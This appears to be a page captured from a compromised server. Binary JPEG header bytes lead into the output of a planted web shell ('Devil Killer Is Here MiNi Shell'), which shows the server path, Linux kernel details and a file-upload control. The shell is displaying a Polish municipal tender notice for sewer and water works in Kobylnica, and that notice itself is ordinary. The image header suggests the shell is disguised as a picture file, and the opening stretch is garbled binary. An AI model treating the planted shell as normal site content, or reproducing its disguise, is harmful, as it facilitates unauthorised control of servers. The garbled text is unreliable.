JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220406/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220406/0011252502-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Budowa lok. systemu zbiorczego w Komorczynie z odprowadzeniem ścieków tranzytem do istniejącej sieci zbiorczej w Sycewicach(Gm. Kobylnica). </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">CENTRUM USŁUG WSPÓLNYCH W KOBYLNICY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 365696881</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wodna 20 lokal 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kobylnica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">76-251</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">598415912</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">598415915</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@cuwkobylnica.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://cuwkobylnica.bip.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Budowa lok. systemu zbiorczego w Komorczynie z odprowadzeniem ścieków tranzytem do istniejącej sieci zbiorczej w Sycewicach(Gm. Kobylnica). </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-66d54b3b-b59d-11ec-97c7-b646b0ba23df</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00112525</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00019295/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Budowa lok. systemu zbiorczego w Komorczynie z odprowadzaniem ścieków tranzytem do istniejącej sieci zbiorczej w Sycewicach (Gm. Kobylnica).</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/cuwkobylnica <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/cuwkobylnica</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/cuwkobylnica . W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego. Zamawiający dopuszcza, awaryjnie, komunikację za pośrednictwem poczty elektronicznej. Adres poczty elektronicznej osoby uprawnionej do kontaktu z Wykonawcami: cuw@kobylnica.pl . Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego Wykonawcy. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na platformazakupowa.pl przesłanych przez Zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM. Zamawiający, zgodnie z §2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 roku w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie, określa niezbędne wymagania sprzętowo – aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.: 1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, 2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje, 3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0, 4) włączona obsługa JavaScript, 5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf, 6) Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej – kodowanie UTF8, 7) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego: 1) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący, 2) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z platformazakupowa.pl, w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”). Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/46-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1)	Administratorem Pani/Pana danych osobowych jest Gmina Kobylnica z siedzibą <br/>w Kobylnicy, ul. Główna 20, 76-251 Kobylnica reprezentowana przez Wójta Gminy, adres email: kobylnica@kobylnica.pl,tel. 59 858 62 00 w. 230, który wyznaczył do prowadzenia spraw związanych z zamówieniami publicznymi Dyrektora Centrum Usług Wspólnych w Kobylnicy;<br/>2)	Administrator wyznaczył inspektora ochrony danych, z którym może się Pan/Pani kontaktować pod adresem email: j.mielczarek@kobylnica.eu tel. 59 858 62 00 <br/>wew. 259;<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie:<br/>a)	art. 6 ust. 1 lit. b, c RODO (Dz. Urz. UE L 119 z 04.05.2016, str. 1),<br/>b)	art. 18 w zw. z art. 19 ustawy Pzp;<br/>4)	Wypełnienie obowiązku prawnego polega na prowadzeniu spraw, do których zobowiązane jest Gmina Kobylnica i jej jednostki w związku z realizacją zadań dot. realizacji niniejszego zamówienia publicznego;<br/>5)	W związku z przetwarzaniem danych w celach, o których mowa w pkt 3 i 4 odbiorcami danych osobowych mogą być:<br/>a)	organy władzy publicznej oraz podmioty wykonujące zadania publiczne lub działające na zlecenie organów władzy publicznej, w zakresie i w celach, które wynikają z przepisów powszechnie obowiązującego prawa a w szczególności w oparciu o art. 18 oraz art. 74 ustawy Pzp;<br/>b)	inne podmioty, które na podstawie umów zawartych z Administratorem określonym w pkt. 1 świadczące obsługę w tym prawną i informatyczną na rzecz Zamawiającego;<br/>6)	Pani/Pana dane osobowe będą przechowywane co najmniej zgodnie z art.78 ustawy Pzp, jednak nie dłużej niż 5 lat zgodnie z Jednolitym Rzeczowym Wykazem Akt obowiązującym w Centrum Usług Wspólnych w Kobylnicy, a jeżeli czas trwania umowy jest dłuższy -okres przechowywania obejmuje cały okres obowiązywania umowy oraz 10 lat od daty wygaśnięcia umowy zgodnie z Jednolitym Rzeczowym Wykazem Akt obowiązującym w Centrum Usług Wspólnych w Kobylnicy <br/>7)	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem postępowaniu o udzielnie zamówienia publicznego, konsekwencją niepodania określonych danych może być odrzucenie oferty;<br/>8)	Pana/Pani dane osobowe nie będą podlegały zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu stosownie do art. 22 RODO;<br/>9)	Posiada Pani/Pan:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>b)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych,<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO,<br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>9)	Nie przysługuje Pani/Panu:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>b)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c,<br/>c)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CUW.DOR.271.8.2022.OZ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Rozdział III. Opis przedmiotu zamówienia<br/>1.	Przedmiotem zamówienia są roboty budowlane i inne czynności zawiązane z budową sieci kanalizacji sanitarnej grawitacyjnej i tłocznej wraz z przyłączami, budową przepompowni ścieków z kablową linią zasilającą w miejscowości Komorczyn, budowa sieci wodociągowej i sieci kanalizacji sanitarnej w Sycewicach, zaprojektowanie oraz budowa sieci kanalizacji deszczowej dla potrzeb odwodnienia dróg gminnych ulic Poprzecznej, Pocztowej, Pogodnej, Za Stawem, Kasztanowej, Lipowej i Kościelnej położonych w miejscowości Sycewice wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej i dokumentacji odbiorowej w ramach zadania „Budowa lok. systemu zbiorczego w Komorczynie z odprowadzeniem ścieków tranzytem do istniejącej sieci zbiorczej w Sycewicach (Gm. Kobylnica)”- (Zadanie Nr 1- Nr 3) finansowanych ze środków Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych”. Przedmiot zamówienia obejmuje:<br/>1.1 Zadanie Nr 1 - Budowa sieci kanalizacji sanitarnej grawitacyjnej i tłocznej wraz z przyłączami, budową przepompowni ścieków z kablową linią zasilającą w miejscowości Komorczyn wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej i dokumentacji odbiorowej, obejmująca:<br/>1)	budowę sieci kanalizacji sanitarnej grawitacyjnej w miejscowości Komorczyn,<br/>2)	budowę przepompowni ścieków na terenie działki nr 20/1 wraz z budową kablowej linii zasilającej i zagospodarowaniem terenu przepompowni, w tym budowę:<br/>a)	przepompowni ścieków (kompatybilnej z pompowniami realizowanymi na terenie gminy Kobylnica), wyposażonej w system monitorowania i sterowania pracą dostosowany do istniejącego systemu operatorskiego,<br/>b)	linii kablowej zasilającej wraz szafą sterującą, nawierzchni wraz ze zjazdem z drogi gminnej w technologii utwardzonej kostka betonową na działkę nr 20/1 obr. Komorczyn, <br/>3)	budowę sieci kanalizacji sanitarnej tłocznej z Komorczyna z włączeniem na granicy działki nr 45 z działką nr 30/2 w Sycewicach, do budowanej sieci kanalizacji sanitarnej tłocznej w ramach Zadania Nr 2,<br/>Uwaga: włączenie do budowanej sieci kanalizacji sanitarnej tłocznej w Sycewicach będzie możliwe po wykonaniu zakresu ujętego w Zadaniu Nr 2 pkt 2 lit. a),<br/>4)	budowę przyłączy kanalizacji sanitarnej w Komorczynie wraz z przełączeniem wszystkich nieruchomości zabudowanych do wybudowanej sieci kanalizacji sanitarnej, wraz z przełączeniem istniejących przykanaliów odprowadzających dotychczas ścieki do szamb i zbiorników bezodpływowych,<br/>5)	budowę przydomowych przepompowni ścieków do wybranych nieruchomości jako kompletnych prefabrykowanych obiektów wraz z zasilaniem,<br/>6)	odtworzenie istniejących nawierzchni położonych w pasach drogowych, poprzez wykonanie wszystkich warstw konstrukcyjnych dróg,<br/>7)	odtworzenie terenów zielonych w pasach drogowych, poprzez ich humusowanie i obsianie warstwy trawą,<br/>8)	odtworzenie nawierzchni na terenach prywatnych z takich samych materiałów, z jakich zostały wykonane,<br/>9)	usunięcie ewentualnych kolizji z istniejącym uzbrojeniem technicznym, <br/>10)	wykonanie tymczasowe obejścia istniejącego uzbrojenia technicznego na czas prowadzenia robót budowlanych,<br/>11)	wykonanie organizacji ruchu na czas trwania robót budowlanych,<br/> oraz<br/>12) wykonanie i przyjęcie do państwowego zasobu geodezyjnego i kartograficznego inwentaryzacji geodezyjnej powykonawczej, <br/>13) wykonanie dokumentacji odbiorowej,<br/>14) uzyskanie pozwolenia na użytkowanie lub zaświadczenia o braku sprzeciwu do zakończenia robót.<br/> 1.2 Zadanie Nr 2 - Budowa sieci wodociągowej i sieci kanalizacji sanitarnej w Sycewicach wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej i dokumentacji odbiorowej, obejmująca: <br/>1)	budowę sieci wodociągowej wraz przełączeniem istniejących sieci i przyłączy wodociągowych w miejscowości Sycewice, w tym:<br/>a)	budowę nowego odcinka sieci wodociągowej, od wpięcia (W1) na działce nr 4/105 do wychodzącej z SUW istniejącej sieci wodociągowej, dalej w sięgaczu ul. Poprzecznej, następnie w pasach drogowych dróg gminnych ulic Poprzecznej, Pocztowej, Pogodnej do spięcia (W41) z istniejącą siecią wodociągową w obrębie skrzyżowania z ul. Lipową i Piwoniową, <br/>b)	spięcie nowobudowanego odcinka sieci wodociągowej z istniejącymi odcinkami sieci wodociągowej m.in. w obrębie ul. Poprzecznej, ul. Pocztowej i ul. Pogodnej oraz w ul. Za Stawem, ul. Kasztanowej,<br/>c)	przełączenie do nowobudowanej sieci wodociągowej wszystkich przyłączy wodociągowych zinwentaryzowanych, jak również ujawnionych w trakcie wykonywania robót budowlanych, <br/>Uwaga: rzeczywiste ilości i średnice istniejących podłączeń należy ustalić w trakcie wykonywania robót.<br/>2)	budowę sieci kanalizacji sanitarnej grawitacyjnej w miejscowości Sycewice, w tym:<br/>a)	budowę sieci kanalizacji sanitarnej od miejsca włączenia w pasie drogowym drogi gminnej ul. Parkowej do istniejącej sieci kanalizacji sanitarnej poprzez studnię (Si1) zlokalizowaną przed przepompownią ścieków, dalej w pasach drogowych dróg gminnych ul. Parkowej (S1), ul. Piwoniowej (S14) i ul. Azaliowej (S36), oraz ponownie w ul. Parkowej wraz z przejściem pod torami kolejowymi (przewiertem sterowanym) do wysokości granicy działki nr 30/2 z działką nr 45, <br/>b)	budowę przyłącza kanalizacji sanitarnej tłocznej do dz. nr 30/1 zakończone zbiornikiem przepompowni wraz z przepompownią ścieków,<br/>3)	odtworzenie istniejących nawierzchni w pasach drogowych, poprzez wykonanie wszystkich warstw konstrukcyjnych drogi z takich samych materiałów dróg,<br/>4)	odtworzenie terenów zielonych, poprzez ich humusowanie i obsianie warstwy trawą,<br/> 5) usunięcie ewentualnych kolizji z istniejącym uzbrojeniem technicznym,<br/> 6) wykonanie organizacji ruchu na czas trwania robót budowlanych,<br/>oraz<br/> 7) wykonanie i przyjęcie do państwowego zasobu geodezyjnego i kartograficznego inwentaryzacji geodezyjnej powykonawczej, <br/> 8) wykonanie dokumentacji odbiorowej,<br/> 9) uzyskanie pozwolenia na użytkowanie lub zaświadczenia o braku sprzeciwu do zakończenia robót.<br/>1.3. Zadanie Nr 3 - Zaprojektowanie i budowa sieci kanalizacji deszczowej dla potrzeb odwodnienia dróg gminnych ulic Poprzecznej, Pocztowej, Pogodnej, Za Stawem, Kasztanowej, Lipowej i Kościelnej położonych w miejscowości Sycewice wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej i dokumentacji odbiorowej, obejmujące:<br/> 1) sporządzenie pełno branżowej dokumentacji projektowo- wykonawczej, w tym:<br/>a)	wykonanie Dokumentacji w oparciu o założenia zawarte w Programie Funkcjonalno- Użytkowym, rysunek koncepcyjny oraz dokumenty do których PFU się odwołuje, m.in. podziału inwestycji na trzy zakresy – Zlewnie: <br/>i.	Zlewnia nr 1: obejmująca zakresem budowę sieci kanalizacji deszczowej w pasach drogowych dróg gminnych: ul. Pocztowej, ul. Poprzecznej, w sięgaczu nr 1 i nr 2 pomiędzy ul. Poprzeczną a ul. Sportową, ul. Sportowej (na odcinku od sięgacza nr 2 do ul. Pocztowej), ul. Pogodnej (odcinek w obrębie ul. Pocztowej), wraz z budową osadnika szlamu i separatora substancji ropopochodnych, oraz wylotu nr 1 do zbiornika wodnego,<br/>ii.	Zlewnia nr 2: obejmująca zakresem budowę sieci kanalizacji deszczowej w pasach drogowych dróg gminnych: ul. Pogodnej, ul. Za Stawem (odcinek drogi od ul. Pogodnej), ul. Kasztanowej (odcinek drogi od ul. Pogodnej), ul. Lipowej (odcinek drogi od ul. Pogodnej), wraz z budową osadnika szlamu i separatora substancji ropopochodnych, oraz wylotu nr 2 do zbiornika wodnego,<br/>iii.	Zlewnia nr 3: obejmująca zakresem budowę sieci kanalizacji deszczowej w pasach drogowych dróg gminnych ul. Kościelnej, ul. Za Stawem (odcinek drogi od ul. Kościelnej), ul. Kasztanowej (odcinek drogi od ul. Kościelnej), ul. Lipowej (odcinek drogi od ul. Kościelnej), wraz z budową osadnika szlamu i separatora substancji ropopochodnych, oraz wylotu nr 3 do zbiornika wodnego,<br/>b)	uzyskanie pozwolenia wodno- prawnego na budowę urządzeń i zrzut wód do odbiornika - zbiornika wodnego położonego przy ul. Pocztowej,<br/>c)	uzyskanie dokumentów niezbędnych do prowadzenia robót budowlanych zgodnie z obowiązującymi przepisami prawa,<br/> 2) wykonanie robót budowlanych, zgodnie z opracowaną Dokumentacją zatwierdzoną przez Zamawiającego, w tym:<br/>a)	budowę urządzeń kanalizacji deszczowej,<br/>b)	demontaż i odtworzenie istniejących nawierzchni dróg, poprzez wykonanie wszystkich warstw konstrukcyjnych dróg,<br/>c)	odtworzenie terenów zielonych (w tym regulacja skarp), poprzez ich humusowanie i obsianie trawą,<br/>d)	usunięcie ewentualnych kolizji z istniejącym uzbrojeniem technicznym, <br/>e)	wykonanie organizacji ruchu na czas trwania robót budowlanych,<br/>oraz<br/> 3) wykonanie i przyjęcie do państwowego zasobu geodezyjnego i kartograficznego<br/> inwentaryzacji geodezyjnej powykonawczej, <br/> 4) wykonanie dokumentacji odbiorowej,<br/> 5) uzyskanie pozwolenia na użytkowanie lub zaświadczenia o braku sprzeciwu do zakończenia robót.<br/>2.	Przedmiot zamówienia jest finansowany z budżetu Gminy Kobylnica oraz dofinansowany ze środków Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych. Zamawiający zabezpieczył środki finansowe na realizację przedmiotu zamówienia w budżecie Gminy Kobylnica na lata 2022 i 2023. <br/>3.	Zamawiający wskazuje, że przedmiotem zamówienia jest wykonanie robót budowlanych oraz przygotowanie dokumentacji określonej w niniejszej umowie, służącej 